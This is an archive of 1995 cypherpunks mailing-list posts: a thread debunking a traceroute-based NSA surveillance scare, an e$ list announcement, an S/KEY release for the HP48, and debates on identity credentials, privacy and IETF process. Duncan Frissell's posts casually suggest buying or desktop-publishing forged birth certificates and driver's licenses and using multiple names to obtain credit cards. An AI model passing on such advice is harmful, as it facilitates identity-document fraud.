From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jwarren@well.com (Jim Warren)
Date: Mon, 6 Nov 1995 06:44:42 +0800
To: Stephen Whitaker <cypherpunks@toad.com
Subject: Re: whose watchin the watchers -- I GOT THE EXPLANATIONS OKAY
Message-ID: <v02120d1bacc2e9d5eaf4@[206.15.66.109]>
MIME-Version: 1.0
Content-Type: text/plain


At 04:19 PM 11/05/95, Stephen Whitaker wrote:
>The following is an exerpt is from Jim Warren's listserv, GovAccess 183.
>
>Are there folks on this list who have insights or definitive information on
>this topic?
>
>Are there ways for someone with access to modify router tables to constantly
>create alternate paths at other routers which would serve to end-around any
>such snoops?
>
>***********begin_included_text*************************
>
>&&&&&&&&&&&&&&&&&&&&
>
>
>Is Someone Already Watching All International Net Traffic?
>
>The following is the transcript of an actual communications trace that a
>friend ran, while I was sitting next to him, watching -- reprinted here
>with his permission.
>
>He did a "traceroute" of two messages that he sent from his machine in
>Switzerland ...




Folks,

I've received ample explanations/corrections to my naive paranoia.

The following will be posted in GovAccess.184, within an hour or two.

Many thanks.

--blushing-jim
Jim Warren, GovAccess list-owner/editor (jwarren@well.com)
Advocate & columnist, MicroTimes, Government Technology, BoardWatch, etc.
345 Swett Rd., Woodside CA 94062; voice/415-851-7075; fax/<# upon request>

[puffery:  John Dvorak Lifetime Achievement Award (1995); James Madison
Freedom-of-Information Award, Soc. of Professional Journalists - Nor.Cal.
(1994); Hugh Hefner First-Amendment Award, Playboy Foundation (1994);
Pioneer Award, Electronic Frontier Foundation (its first year, 1992);
founded the Computers, Freedom & Privacy confs, InfoWorld; blah blah blah :-).]

=== EXPLANATION OF WHAT GOVACCESS IS & WHERE TO FIND ITS ARCHIVES ===

GovAccess is a list distributing irregular info & advocacy regarding
technology and civil liberties, citizen access to government - and
government access to citizens, covert and overt.

To add or drop GovAccess, email to  Majordomo@well.com  ('Subject' ignored)
with message:  [un]subscribe GovAccess YourEmailAddress (insert your eaddr)
For brief description of GovAccess, send the message:  info GovAccess





===this will be posted in GovAccess.184===

Enlightenment Regarding European Net Traffic Flowing Through Numbered Sites

If I'm gonna let my net-surveillance paranoias burn brightly, I better
learn more about the technology.  Which is to say, I goofed:

In #183, yesterday eve, I flamed forth about how a friend traced his
messages from Switzerland to San Jose CA and to Israel -- and discovered
that they "went through an unnamed site -- 134.222.9.1 and then a
strangely-named site, "lp (134.222.35.2)" -- then through the same Vienna,
Virginia (USA) site ... and thereafter, on to their destination."

With beady eye and suspicious mind, I then entoned, "Now let me see ...
which spy agencies are located in or near Virginia?"


Well, half a dozen net-*literate* technoids quickly corrected the errors of
my ways:

>Date: Sun, 5 Nov 1995 08:25:17 +0100
>Subject: GA183 booboo
>To: jwarren@well.com
>From: nobody@REPLAY.COM (Anonymous)   [apparently an anonymous remailer --jim]
>Organization: RePLaY aND CoMPaNY UnLimited
>XComm: Replay may or may not approve of the content of this posting
>XComm: Report misuse of this automated service to <postmaster@REPLAY.COM>
>
>Jim--
>      Great work, but you've got to be more careful. ...
>
>I ran it by Cypherpunks and, within a half-hour, got ... [among others] ...
>
>From: Richard Huddleston <reh@wam.umd.edu>
>Date: Sun, 5 Nov 1995 01:55:09 -0500
>To: cypherpunks@toad.com, nobody@REPLAY.COM
>Subject: Re: lp (134.222.35.2)?
>Sender: owner-cypherpunks@toad.com
>
>134.222.0.0 is a Class B network, so if you do 'whois' on 134.222.0.0
>(instead of the individual IP addresses) you find:
>
>European Unix Users Group (NET-EUNET-X25)
>   Kruislaan 413
>   NL-1098 SJ Amsterdam
>   NETHERLANDS
>...

and

>X-Pgp-Fingerprint: 01107BAB1C85F1B49358D98FEAD4339E
>Date: Sat, 4 Nov 1995 23:01:42 -0800
>To: cypherpunks@toad.com
>From: Stephan Somogyi <somogyi@digmedia.com>
>...
>>>  Now let me see ... which spy agencies are located in or near Virginia?
>
>Oh please.
>
>The probable reason that the InterNIC doesn't know about the
>132.222.0.0 networks is because they're in Europe. If you search for
>either of the network numbers of the IP addresses mentioned above in
>the RIPE database <http://www.ripe.net/>, you will find that they
>belong to the EUnet backbone.
>
>After pinging 134.222.9.1 successfully, I telnetted to it and it
>claimed, quite plausibly, that it's a device (presumably a router) in
>Amsterdam. I am currently unable to ping 134.222.35.2; this, however,
>fills me with no dread whatsoever.
>
>Stephan Somogyi               Senior Editor               Digital Media

and

>Date: Sun, 05 Nov 1995 13:42:55 -0800
>From: John Fricker <jfricker@vertexgrp.com>
>Subject: Return of Paranoia and Vienna
>
>Using nslookup to reverse resolve 134.222.15.2 reveals it to be
>"Oslo1.NO.EU.net" and 134.222.9.1 to be "Amsterdam4.NL.EU.net".
>
>Now this doesn't mean they are not nefarious, packet sniffing spy-boxes
>since I doubt the spooks would name their routers
>"cloak-and-dagger1.cia.gov".
>
>It still is strange that it is cheaper for UUnet/EUnet to route traffic
>across the Atlantic to get to Isreal instead of developping a continental
>backbone. In many ways the architecture of the Internet is still rather
>primitive.
>
>john fricker
>dir research and development
>The Vertex Group, Inc.

followed by

>Date: Sun, 05 Nov 1995 13:23:06 -0800
>From: John Fricker <jfricker@vertexgrp.com>
>Subject: Paranoia and Vienna
>
>Now, Jim I think you're a touch paranoid here. And after reading the
>latest about the FBI wire tap bill I don't blame you ;)
>
>134.222.0.0 is in the EU domain so most likely both of those routers are
>European. The packets then went into UU Net Technologies Vienna hub. I did
>a traceroute from me to 193.8.230.64 and went through two EU.net routers
>in Vienna, VA. Vienna must be one fiberous town! Sure would make for a
>nice little listening post for nosy ears. I don't know off hand the
>relationship between EUnet and UUnet but I would guess that they are more
>than just friendly. Microsoft bought a minority interest in UUnet which
>inspired UUnet to grow rapidly. (Now there's another tidbit for paranoia!)

===

Oh ... sez I <blusing>.


So the remaining question was -- why would a msg from Switzerland go
through Alternet in Virginia on its way to Israel?  I asked several of the
[many] folks who enlightened me re the numbered sites, and within minutes,
got back:

>From: Tim Pozar <pozar@kumr.lns.com>
>Date: Sun, 5 Nov 1995 11:28:44 -0800 (PST)
>
>...
>> So the only remaining question is ... why should a Swizz msg go thru
>> Alternet in Virginia in order to get to Israel?
>
>A number of links go through there.  Most of this is tied up with
>politics and policies with the links that go over to Europe and
>little to do with the NSA. ...

Which leaves me without any inflamatory paranoia at all ... except to
wonder about those "politics and policies" that cause traffic from and to
European sites to flow through a site near the NSA and CIA.

===

To which, I just received this additional response -- email traffic's hot
'n' heavy (sender prefers to be anon :-):

Almost certainly just a matter of available capacity or administrative
issues.  There may be higher bandwidth routes available from both of those
points to the U.S., rather than directly to each other, so the traffic is
routed that way.  There are often administrative issues too--that is,
sometimes the direct routes are controlled by some company or group to which
a different net doesn't subscribe, and they have to route differently,
through entities that they both subscribe to or have agreements with (e.g.
Alternet).  This happens a bunch in Europe (and here for that matter--it's
part of the reason that some traffic from L.A. to S.F. used to route through
Atlanta or NY or similar places--and still can (depending on the service
providers).  The topology of the net is "logically" sensible, but not
necessarily geographically so...


--spooky jim, who can't tell a carburator from a crankshaft, net-wise


&&&&&&&&&&&&&&&&&&&&


Net Police, Take Note:  Net is the Fastest Self-Correcting Human System I Know

On the upside of the above notes is that they [again] illustrate how
quickly the net corrects erroneous postings -- which is my answer to all
those who howl for censorship or content-control of the net, "because it
distributes incorrect information."

It does -- but it also distributes, uh, "vigorous" corrections to any iota
of intended or naive imperfection in a posting, at least to the extent that
such postings receive significant circulation on the net.  (And if they
don't, then they are little different than the erroneous information that
people exchange by voice and phone, every day.)

And woe be unto the reputation of anyone who appears to have posted
*intentionally* incorrect or biased-incomplete information -- who get
vigorously torched in the process of getting corrected.  :-)

I think it was John Perry Barlow who observed that, the best way to get a
question answered on the net, was to post it in the form of an erroneous
statement.

--jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@utopia.hacktic.nl>
Date: Sun, 5 Nov 1995 21:40:33 +0800
To: cypherpunks@toad.com
Subject: Re: lp (134.222.35.2)?
Message-ID: <199511051334.OAA22080@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



[..]
: This is silly.  If the NSA were monitoring traffic with the consent of
: EUnet and UUNET (and note that EUnet is owned by UUNET rival PSI), they
: wouldn't need to play these routing games; they'd just eavesdrop at an
: interconnect or on the leased lines leading into it, run a rough filter
: over it to cut down volume, and tunnel the traffic home through other
: channels (probably satellite).  And if they were monitoring without the
: consent of UUNET and EUnet, they still wouldn't play these games because
: the providers would be upset about the unexpected load on the expensive
: and overloaded transatlantic pipes.

PSI has an 11% stake in EUnet, since they took over EUnet Britain, 11% doesn't
qualify as 'owning' where I live.

Regards,
-AJ-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Whitaker <whitaker@sover.net>
Date: Mon, 6 Nov 1995 05:28:19 +0800
To: cypherpunks@toad.com
Subject: whose watchin the watchers
Message-ID: <199511052119.QAA28698@maple.sover.net>
MIME-Version: 1.0
Content-Type: text/plain


The following is an exerpt is from Jim Warren's listserv, GovAccess 183.

Are there folks on this list who have insights or definitive information on
this topic?

Are there ways for someone with access to modify router tables to constantly
create alternate paths at other routers which would serve to end-around any
such snoops?

***********begin_included_text*************************

&&&&&&&&&&&&&&&&&&&&


Is Someone Already Watching All International Net Traffic?

The following is the transcript of an actual communications trace that a
friend ran, while I was sitting next to him, watching -- reprinted here
with his permission.

He did a "traceroute" of two messages that he sent from his machine in
Switzerland (he'd telneted into it while we were at a computer conference
in California).

Traceroute automatically reports each Internet node through which a message
passes, as it proceeds from origin to destination.

He did two traceroutes.  The first was from Switzerland to an addressee at
Netcom in San Jose, California.  The second was from Switzerland to an
addressee in Israel.


Date: Fri, 21 Apr 95 02:54:58 +0200
From: kelvin@fourmilab.ch (John Walker)
To: jwarren@well.com
Subject: Traceroute

> /usr2/kelvin> traceroute netcom11.netcom.com
traceroute to netcom11.netcom.com (192.100.81.121), 30 hops max, 40 byte packets
 1  eunet-router (193.8.230.64)  2 ms  2 ms  2 ms
 2  146.228.231.1 (146.228.231.1)  326 ms  345 ms  307 ms
 3  Bern5.CH.EU.NET (146.228.14.5)  447 ms  408 ms  364 ms
 4  146.228.107.1 (146.228.107.1)  127 ms  37 ms  36 ms
 5  Zuerich1.CH.EU.NET (146.228.10.80)  37 ms  38 ms  175 ms
 6   (134.222.9.1)  65 ms  109 ms  252 ms
 7  lp (134.222.35.2)  196 ms  179 ms  405 ms
 8  Vienna1.VA.ALTER.NET (137.39.11.1)  191 ms  179 ms  313 ms
 9  fddi.mae-east.netcom.net (192.41.177.210)  336 ms  204 ms  303 ms
10  t3-2.dc-gw4-2.netcom.net (163.179.220.181)  182 ms  251 ms  187 ms
11  t3-2.chw-il-gw1.netcom.net (163.179.220.186)  305 ms  586 ms  518 ms
12  t3-2.scl-gw1.netcom.net (163.179.220.190)  537 ms  693 ms  797 ms
13  t3-1.netcomgw.netcom.net (163.179.220.193)  698 ms  549 ms  754 ms
14  netcom11.netcom.com (192.100.81.121)  890 ms  1922 ms  1696 ms

> /usr2/kelvin> traceroute jerusalem1.datasrv.co.il
traceroute to jerusalem1.datasrv.co.il (192.114.21.101), 30 hops max, 40
byte packets
 1  eunet-router (193.8.230.64)  2 ms  3 ms  2 ms
 2  146.228.231.1 (146.228.231.1)  933 ms  853 ms  874 ms
 3  Bern5.CH.EU.NET (146.228.14.5)  1040 ms  450 ms  525 ms
 4  146.228.107.1 (146.228.107.1)  453 ms  424 ms  188 ms
 5  Zuerich1.CH.EU.NET (146.228.10.80)  64 ms  61 ms  47 ms
 6   (134.222.9.1)  80 ms  312 ms  84 ms
 7  lp (134.222.35.2)  270 ms  400 ms  216 ms
 8  Vienna2.VA.ALTER.NET (137.39.11.2)  660 ms  1509 ms  886 ms
 9  dataserv-gw.ALTER.NET (137.39.155.38)  1829 ms  1094 ms  1306 ms
10  orion.datasrv.co.il (192.114.20.22)  1756 ms  1280 ms  1309 ms
11  ...


Notice that both messages went through an unnamed site -- 134.222.9.1 and
then a strangely-named site, "lp (134.222.35.2)" -- then through the same
Vienna, Virginia (USA) site ... and thereafter, on to their destination.
I.e., the second message went through Virginia to get from Switzerland to
Israel.

The whois servers at the InterNIC and at nic.ddn.mil for MILNET Information
report, ``No match for "134.222.9.1". '' and `` No match for
"134.222.35.2".''

Now let me see ... which spy agencies are located in or near Virginia?

--jim


&&&&&&&&&&&&&&&&&&&&

***********end_included_text*************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 6 Nov 1995 06:39:12 +0800
To: www-buyinfo@allegra.att.com
Subject: e$: The Movie
Message-ID: <v02120d01acc2e740f9f0@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


                               Announcing
                             e$: The Movie


11/6/95

Almost a year ago, I noticed that traffic was tapering off on one of
the digital commerce e-mail lists I'm subscribed to, www-buyinfo, which
is run by Dave Kristol at ATT. So, every once in a while, I started
zinging relevant crossposts over there from cypherpunks, a famous
crypto list with about 20-25% e$ content.

I started getting actual fan mail for this, so I kept doing it. Now, it
seems that, say, 85% of all of the traffic on www-buyinfo is my
cross-posting from cypherpunks. Dave says there are 500-600 people
worldwide who have stayed on www-buyinfo during all this time, so it
seems like I can claim at least some of them as an audience for what
I'm doing, with no promotion of the list at all, except word of mouth.

We've even had several discussions on the list about whether I should
continue doing it, and every time we've done so, the answer has been a
resounding "yes".  However, www-buyinfo does have a charter, and even
though what I'm doing drifts the charter substantially, I'm restricted
in what I can put there.  It's not fair to Dave or the subscribers for
me to turn their list into my private spam channel. Also, Dave
has said repeatedly that he's interested in re-tooling www-buyinfo
into something more technical, so, at some point, the party's going
to be over, and we'll have to pack up our tents and move on.

Meanwhile, I've also taken to writing on the net, and more recently,
speaking to professional groups, on the topic of e$, and I have gotten
very good response to that as well. An edited version of one of my
longer net.rants is in this week's InfoWorld, for instance. That one
got me fan mail from all sorts of people (like Guy Kawasaki, Stewart
Alsop, and Adam Engst, for instance) when the original version appeared
first in the apple-internet-users list a while back.

I've managed to have a lot of fun with this stuff. One of my
suggestions on cypherpunks started ecm, the secondary market for
Digicash's beta-test digital cash certificates. I had so much fun
talking about digital commerce with Peter Cassidy, a freelance writer
for Forbes ASAP, Wired, and the Economist, that the two of us started
the Boston Society for Digital Commerce, a luncheon group that meets
once a month to talk about this stuff. BSDC has about 40 members now,
and our second meeting is on Tuesday.


So, I've decided I'd jump into this with both feet.  A friend of mine at
Apple Computer, Vinnie Moscaritolo, has volunteered his time to put up
a web site about e$. It's pretty much live, though still under
construction, at its temporary home of

http://www.webstuff.apple.com/~vinnie/rah/ .

Vinnie is now in the process of hooking up a small stand-alone machine,
to live somewhere else on the net besides in Apple's domain, which will
house this web-site along with three mailing lists, all of which will
be archived and eventually web-searchable. Over the next few weeks,
we'll be starting up these lists and announcing them here. They are:

* _e$_: A discussion list on digital commerce and financial cryptography
and their consequences.  This list will be for people who have a strong
understanding of markets of all kinds, who understand the consequences
of strong cryptography and digital certificate technology on public
networks, and who want to make money in this environment. We welcome
Entrepreneurs, Analysts, Cryptographers (Amateur and Otherwise), Free
Marketeers, small-"l" libertarians, and, even (horrors!) a
crypto-anarchist or two.

* _e$pam_:  My personal spam-channel to the universe. ;-). Pretty much
what I do now with www-buyinfo from cypherpunks, only with all the
net.sources I can find. It will have the same content touchstone as e$
will, but it will consist entirely of filtered information from
secondary sources. In other words, it won't say "e$spam" until I say it
says "e$spam".  At some point, e$spam will have filter-fodder in it --
or some other method will be set up -- so that people who are already
subscribed to one of the lists I'm filtering won't have to see things
twice. We're still working on that.

* _Ne$ws_, a newsletter with original content from myself and various
other authors, in the same vein as Adam Engst's TidBITS, but focused on
the subject of e$.


I figure that there are enough different ways to pay for both my time
and the resources necessary to make this work that it's now worth
spending a little of my own time and resources in order to get all this
started. Certainly the market for information and commentary on e$
isn't getting any smaller.

I'm looking at a sort of "creep, crawl, walk, run" scenario for funding
all of this. The first stage will be to solicit sponsorships, both
in-kind and in plain old money. The second will probably be to
determine whether subscriptions to any or all of the e$ lists or
archives would ever make sense. Finally, with the advent of real
digital cash on the net, and with First Virtual proving e$ trades can
be done by anyone, it may be possible to do some kind of e$
micropayment-as-you-go system for things like subscriptions,
web-archive access, and the like, so I'm looking at that also.

Obviously, I'm don't want to price myself out of the market with all of
this, because, like anything else on the net, anyone can come along and
do exactly the same thing for less money, and then I'm out of business.
I do think, however, that what I propose to do is worth money to the
people who want it, and so I'm going to figure out how to get paid to
do it.


Well, that's about it.  Watch this space for details, and wish me luck!


Cheers,

Bob Hettinga,
impre$ario-to-be






-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJ04K/gyLN8bw6ZVAQG+2QQAowzLfmH5paNaZgrAdlEeSH9YcKysW07A
B7QxbQhP9WIat2rMIA4HoIioQr+Xo5RZ3oOO+btSksHNnV1P3Q2Ca49BJxdMsQd7
GhdGoUv2/C150mH13crc3cZuOCChfisjYHM8So2XsuVjKex4ETZecDLfSn+b4yzl
mtfJvZQ3e1o=
=2vLb
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Mon, 6 Nov 1995 00:33:44 +0800
To: cypherpunks@toad.com
Subject: S/KEY available for HP48 handheld calc
Message-ID: <9511051627.AA15400@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Steve VanDevender (<stevev@greylady.uoregon.edu>) made available (GNU
GPL) an S/KEY implementation for the nice HP hand held calc,
It works very nice with both MD4 and MD5 based system (I personnaly
tested with my MD4 based logdaemon-4.9, the author recommend OPIE's
one)

I've put his stuff on my anonymous ftp, you can fetch the stuff
starting on 
  ftp://ftp.box.eu.org/hp48/skey/
(ftp.box.eu.org=hplyot.obspm.fr=145.238.44.5)
the executable I got from usenet has the following MD5 digest:
1b2613383708d4825f5842ed3e630d40  skey

I hear you can get an hp48 for $30 in the Us (I paid my hp48g US$230
when it came out in France two years ago),
So no more excuse of clear passwd over the net ! [nor to sell 'smart
cards' mega bucks!]

ps: Who write PGP for hp48 now ;-) ? 
[or maybe more seriously some skey hooks to it ?]

dl
- --
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Panama South Africa DST domestic disruption counter-intelligence
 cracking Legion of Doom

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAgUBMJzlz3k52/beodHxAQEAGQP/XcX3mOw8YIVKe3kEuUkRb6wjB7JAvTi3
t/aQNAT/LQR4ZCx954HbqS231P3qxuz2Hc88xs7HAfbzk91C6VQ9J/r1+C7yBMiR
Jlk19lnWny8yHlkwm8KzF1TvqnZ6LvnGgLoiq5ExJIGJpRyJUf912LZf8N06tyFG
IJs8ZcN8/Kk=
=6RT6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 6 Nov 1995 13:06:07 +0800
To: Stephen Whitaker <whitaker@sover.net>
Subject: Re: nym-compoop
In-Reply-To: <199511060335.WAA04917@maple.sover.net>
Message-ID: <Pine.SOL.3.91.951105204109.7550C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 5 Nov 1995, Stephen Whitaker wrote:

> Back to where this started:
> Eating my tasty crow gives rise to another question relating to the timing
> and continuity of these threads: How did the first responder on the RE:
> 134.222.9.1, Simon Spero, reply at 10:48 pm on Nov. 4 to Anonymous' posting
> of 7:19AM on Nov 5? Which way is this thing spinnin?

Multiple choice:

a) Because I have a PPP connection to Dionne's Psychic Internetwork
b) Because my brownian motion RNG used an inferior quality rubber band 
   and I can now travel through time.
c) Because the Earth is round.

lets work the example:

a) can't be correct, because there's no way anyone on my salary could 
   afford the 1-900- charges.

b) can't be correct because If I could travel in time this weekend, I'd have 
   gone to  Ramat Gan with an Uzi, and one of the best generals of the 
   twentieth century would still be  alive.

c) could be... I wrote the message from a machine in Menlo Park, which is 
   in the pacific time zone. Convert both times to GMT, and everything make 
   sense.

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 7 Nov 1995 01:27:27 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: using PGP only for digital signatures
Message-ID: <199511060208.VAA14123@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>> Consider this: most people in the U.S. do not have a "credential" that
>> shows them to be U.S. citizens. (Hint: most people in the U.S. do not have
>> passports.)

My passport is always close at hand.  I love an unchallengeable credential
that has neither my address nor my SS# on it.  I also carry my birth
certificate which I use for most non-driving interactions.  It doesn't have
much useful info on it.  Secured credit cards which can be obtained in any
name are also handy.  

>A green card, by itself, also fails to prove legal status.

Don't "green cards" have pictures now.  If they do they should be usable to
prove both status and identity.  I'm talking about the new "renewable" ones.

>Proving legal residency requires a combination of two documents, one each
>from specified lists. Most commonly a driver's license, green card (which
>is actually pink), or birth certificate from list A, and a social
>security card from list B. 

You need proof of citizenship or residency and proof of identity.  Passport
and naturalization papers work for both.  Otherwise you have to pay the $25
to the guy on the corner for a birth certificate and drivers license.  Or
DTP it yourself since employers aren't very good at checking papers.  Or
dodge the whole thing and work for yourself.

DCF

"Who am us, anyway?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 6 Nov 1995 10:23:00 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: "The Policeman Inside"
Message-ID: <199511060208.VAA14131@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:54 AM 11/5/95 -0800, you wrote:

>My point, originally, to Rich Graves' mention of Chris Hibbert's excellent
>FAQ on Social Security Numbers and person numbers, is that it is no longer
>relevant to fight against a "single index number." Modern data base methods
>are so well-suited to cross-indexing that it hardly matters whether there's
>a single point of entry to the data base or not.

However, modern life is also well-adapted to the counter strategy of
fuzzying up any focus on your "cluster of transactions."  Thus it is trivial
to use multiple names and addresses for multiple transactions.  Particularly
if you "go bare" in the insurance arena, many tracking opportunities are
denied your opponents.  This will also save you big bucks in premiums
foregone.  You also have to watch the stuff most people don't think about
like magazine subscriptions which can easily be had in any name (and should be).

The current possibility of getting multiple secured credit cards in multiple
names will become even more fun as the temporary Visa and Mastercards
(travelers's checks on a card) are issued.  Plenty of entrepreneurs will be
buying and selling those.  Just like the phone card market today.

>THE KEY POINT IS THIS: Are voluntary economic transactions between persons
>to be subject to approval and regulation by the State? 

They will no doubt try but closed systems have a hard time competing with
open systems. A good way to track the future control possibilities is to
track how easy it is to get an internet account.  If it remains as easy to
get an internet account in the future as it does today, then it will be very
hard to indulge in central transaction controls. I am predicting that there
will be a convergence between the ease of communicating over the nets
(institutional ease not interface ease) and the ease of completing
transactions.  I think the convergence will be one sided in the direction of
easier and easier transactions.  Again, I'm not talking about technical ease
here but the structural or institutional ease of completing transactions.
"Frictionless Capitalism" is frictionless across the board.

The belief that it is possible to "press down upon the brow of labor this
Crown of Thorns, to crucify mankind upon a Cross of Red Tape" (to mangle a
phrase) is worthy of ridicule.  I happened to catch "Funeral in Berlin"
today.  The Commies didn't manage it with a lot more going for them than
Slick Willie has.  They got their clocks cleaned by MarketEarth.  The
Securities and Exchange Commission doesn't stand a chance.  

>If babysitting and
>lawnmowing, not to mention hiring someone to write some C code, requires
>submitting tax and Social Security forms, requires checking the J-1 vs.
>Permanent Resident vs. Approved Citizen Unit status, then the die is cast.

I thought the guy was in Zamboanga (where the monkeys have no tails).  At
least that's what he told me in his email.  The gardener was an independent
contractor.  The babysitter worked for a temp agency (at least that's what
she said).  I know I paid a company.  At least the digicash went to
something with a company name.

>Well, the State is becoming more efficient in tracking such things, and tax
>penalties are increasing.

Not sure if that's true.  Are there fewer illegal aliens, fewer people
driving without licenses, fewer people practicing medicine without a
license, etc than in 1960, 1970, 1980?  I seriously doubt it.

>In closing, we must beware "the policeman inside," to use the William
>Burroughs term. A surveillance state that arises because modern computers
>and data bases allow all economic transactions to be monitored, taxed, and
>approved or disapproved is a horror we should fight with all of our
>resources. Whether right-, left-, or libertarian-leaning, the implications
>of this state power to control our lives are horrible.

No argument there.

DCF

"Freedom isn't Freeh 
freedom isn't Freeh
you've got to pay the price 
you've got to sacrifice
for your liberty" -- Here's hoping you're all morally rearmed.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 6 Nov 1995 10:22:49 +0800
To: John Young <jya@pipeline.com>
Subject: Re: 800_ape
Message-ID: <199511060208.VAA14144@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:23 AM 11/4/95 -0500, you wrote:
>   11-5-95. NYPaper Sunday Magazine:
>
>   "Making Microsoft Safe For Capitalism. How do you restrain
>   an 800-pound gorilla?" Cover story. By James Gleick.

>     It's time to draw the line. But where?
>
>      'Anything not a direct lie or clearly illegal is O.K. to
>      do if it advances Microsoft's tribal cause,' Mitchell
>      Kapor says. 'This licenses the worst sort of
>      manipulations, lies, tortured self-justification and so
>      on.'

So Gleick wants to unleash the Justice Department to protect his ISP from
Microsoft's competition.  Can't cut it without Big Brother's help, eh?  

All I've got to say about this piece of commie trash is GM, ATT, IBM, USSR,
CIA, & KGB.

It took me all of 10 seconds to figure out how to delete the icons for the
MSN and MS' Internet Browser from my WIN95 desktop.  The help message that
popped up when I did this also told me how I could delete the actual
programs from my hard drive.  (Hint James try clicking the *right* mouse
button.)

DCF

"Worrying about a large institution especially when it has computers is like
worrying about a large gorilla especially when it's on fire." Bruce Serling.
CFP95. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Mon, 6 Nov 1995 06:33:31 +0800
To: cypherpunks@toad.com
Subject: Re: Credentials Without Identity
In-Reply-To: <acc1ae3828021004292e@[205.199.118.202]>
Message-ID: <47jcob$cf7@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.HPP.3.91.951105123707.4854A-100000@cor.sos.sll.se>,
Mats Bergstrom <asgaard@sos.sll.se> wrote:
> This applies very much so in Sweden too. It *is* illegal to maintain any
> database with 'information on persons' (like their email addresses) without
> approval from the Data Inspection. But it's an open secret that this law
> is broken on a massive front and no bureaucrat is really trying to uphold it.

This is the worst possible situation, because it equates to a licence
to harass for the police.  If you obey the law, then you are at a
disadvantage compared to people who are not bound by it because they
are ignoring it, and who can because they are doing government-friendly
things; but if you break the law, then you can be prosecuted.
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 6 Nov 1995 15:12:03 +0800
To: cypherpunks@toad.com
Subject: Re: Keyed-MD5, and HTTP-NG
Message-ID: <199511060639.WAA20500@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 1 Nov 1995 hallam@w3.org wrote:

> > There were two names on the MD5 document -- mine and Bill
> > Simpson's. Bill didn't tell me that he was called (I suspect he 
> > would have), and I wasn't called, either. We were the only two 
> > editors of that portion of the specification.
> 
> This appears to have been a problem from both ends. A number of
> people arround here only heard about the IPsec work when it had
> reached the final call phase.

Hmmm, I guess (as usual) people weren't keeping up with the drafts.  It 
really makes some of us outsiders wonder what the IETF actually does in 
its gilded white towers.

> I think this highlights one of the problems with the IETF we need a 
> much broader infrastructure for understanding what progress other 
> groups have made. The time when we can expect to do everything through 
> email alone is past. I wish I could persuade more people in the IETF
> that the Web infrastructure could provide a valuable assistance
> as a collaboration tool for their needs. Unfortunately the approach seems
> to be that because there are is a person living at the end of a 2400
> baud modem in vermont who cannot configure his PPP we should all continue
> in the stone age. 

I guess that's certainly an _elitist_ attitude.  Let's leave Vermont alone
for a second and maybe talk about including the developing world in the
process.  That might explain some of the resistance. 

In many parts of the world, the basic telecommunications infrastructure
simply won't support a 2400 baud connection.  Does this then mean that
there should be no advocate, no voice for citizens from those regions
because they are limited to 300 baud? 

Hopefully we all agree that developing nations are equally entitled to a
voice in establishing standards which will define the foundations of the
next century.  I can't imagine anyone arguing for a pre-emptive silencing.
of voices which strive to be heard through setting technical standards as
a floor -- minimum standards which are designed *purposefully* to exclude. 

Next thing someone will advocate is EBCDIC, or something equally lame
idea, I guess ... 

> We could improve readability of RFCs through using HTML and reduce
> the flamage on mailing lists through collaboration tools like the
> open meeting. But we don't because it hasn't been done that way in the
> past.

Well, I think that it is possible to read a mailing list through HTML if
that is what you would like to do.  You have that option and choice. But
this does not mean that you should dictate that everyone should follow
your choices and preferences. 

While some would argue, that the attempted imposition of your personal
preferences is demonstrative of a monstrous ego that does not recognize
inherent individual jurisdiction, I won't expose myself to the accusation
that I would advance such a specious argument, I will simply ask what you
would suggest is the solution to including alternate views and voices, if 
it isn't a mailing list.

Will the standards track follow a policy of inclusion or historic policies
of exclusion? 

> I would like to see a collaboration system where I can present an expert
> with the context of a proposal very rapidly without expecting them to
> read the archives of an entire mailing list.

It really doesn't take all that long to get up to speed.  A couple of
months, tops.

> 	Phill
> 


Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
